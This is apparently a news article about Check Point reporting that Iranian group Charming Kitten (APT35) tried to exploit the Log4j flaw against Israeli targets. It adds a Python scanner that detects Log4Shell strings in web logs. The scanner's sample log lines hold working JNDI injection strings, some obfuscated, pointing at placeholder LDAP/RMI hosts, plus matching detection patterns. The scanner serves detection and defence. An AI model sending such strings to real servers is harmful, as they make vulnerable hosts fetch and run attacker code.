An Iranian hacking group associated with the regime, known as "Charming Kitten" or APT35, was behind an attempt to exploit the Log4j vulnerability against seven Israeli government and business targets, the cyber security firm Check Point reported Wednesday.
Check Point "blocked these attacks, as we witnessed communications between a server used by this group and the targets in Israel," it stated.
“The scope of this attack was between 6 am-4 pm [on Wednesday]. There’s no evidence for the group’s related activity on targets outside of Israel,” the company clarified.
Charming Kitten is an Iranian government cyber warfare group; the cybersecurity company FireEye designated it "a nation state-based advanced persistent threat, regardless of the lack of its sophistication."
Check Point's reports from the last 48 hours "prove that both criminal hacking groups and nation-state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors' operations are to be revealed in the coming days."
The Apache Log4j vulnerability (tracked as CVE-2021-44228 and widely called Log4Shell) affects consumer and enterprise applications, cloud services and websites that use Log4j, the widely deployed open-source Java logging library. It is a remote code execution (RCE) flaw that Apache rated at the maximum CVSS score of 10.0: an attacker who can get a crafted string such as a JNDI lookup into any logged field (a User-Agent header, a username, a search query) can make the vulnerable server fetch and run attacker-supplied code.
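Because the attack string travels inside ordinary request fields, the first thing a defender does is search existing web and application logs for it. The scanner below is an added example written for this page, not Check Point's or Apache's code: it folds the two most common obfuscations attackers used in the first week (`${lower:j}`/`${upper:j}` case lookups and `${...:-j}` default-value lookups, including the empty `${::-j}` form) back into plain text before matching, so nested variants are caught alongside the literal `${jndi:ldap://...}`. The log lines are constructed for the example and use RFC 5737 documentation addresses.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines (not captured traffic). Lines 1-3 carry a
# Log4Shell probe in the User-Agent or query string; line 4 is a benign lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.9/x} HTTP/1.1" 404',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/o}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${env:HOME}"',
]

# Log4j lookups that attackers nest to hide the literal "jndi" string:
#   ${lower:j} / ${upper:j}  -> the character, case-changed
#   ${<lookup>:-j}           -> default value of a failed lookup, e.g. ${::-j}
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What we are actually looking for: a JNDI lookup and the URL scheme it points at.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Collapse nested case/default lookups until the text stops changing.

    Every substitution shortens the string, so the loop always terminates.
    """
    def fold_case(m: "re.Match") -> str:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()

    prev = None
    while prev != text:
        prev = text
        text = CASE_LOOKUP.sub(fold_case, text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def scan_line(line: str) -> Optional[str]:
    """Return the JNDI URL scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = JNDI_LOOKUP.search(normalize_lookups(line))
    return m.group(1).lower() if m else None


def scan_logs(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, scheme) for every line that contains a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = scan_line(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for idx, scheme in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: jndi:{scheme} lookup -> {normalize_lookups(SAMPLE_LOGS[idx])}")
```

Run against the sample, lines 1, 2 and 3 are flagged (ldap, ldap, rmi) and the harmless `${env:HOME}` is not. Two caveats a practitioner should keep in mind: the normalizer only undoes the `lower`/`upper` and default-value tricks, so a lookup hidden behind other Log4j lookups (for example `date` or `sys`) needs its own rule, and a log hit only proves that a probe arrived; whether it succeeded is answered by outbound LDAP/RMI/DNS connections from the application host around the same timestamp.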
Since Friday, when the vulnerability was disclosed, threat actors around the world have been scanning for vulnerable systems and trying exploits against them.
Check Point says that the outbreak of attacks is "clearly a cyber pandemic that hasn't seen its peak yet."
Early reports showed thousands of attack attempts, rising to over 40,000 during Saturday. Twenty-four hours after the initial outbreak, Check Point's sensors recorded almost 200,000 attack attempts across the globe leveraging this vulnerability. Seventy-two hours after the initial outbreak, the number had passed 800,000.
"It is clearly one of the most serious vulnerabilities on the internet in recent years, and the potential for damage is incalculable," Check Point warned.
Iran and Israel have been engaged in cyber warfare in recent years, with Iran attacking a broad array of targets, and Israel focusing on Iran’s nuclear program.
Israel has also reportedly carried out several successful cyberattacks against critical Iranian infrastructure.
Most recently, in October, a massive cyberattack hit Iran's network of gas stations, disabling about 4,000 stations across the country for about two days. Iran blamed Israel for the attack.
The Washington Post reported in May 2020 that Israel was behind the May 9 cyberattack on Iran's Shahid Rajaee port in Bandar Abbas, the largest in the country, which brought shipping traffic to an abrupt and unexplained halt for days and created backups miles long.
The report quoted experts who said the attack was Israel's retaliation for the April 24 Iranian attempt to penetrate Israeli computers that control water flow and wastewater treatment, as well as a system that regulates the addition of chlorine and other chemicals. That attempt was detected and thwarted by Israeli defenses.
Iran’s nuclear weapons project was severely damaged by the 2010 Stuxnet cyber-attack on Iran’s nuclear centrifuges, attributed to Israel and the US.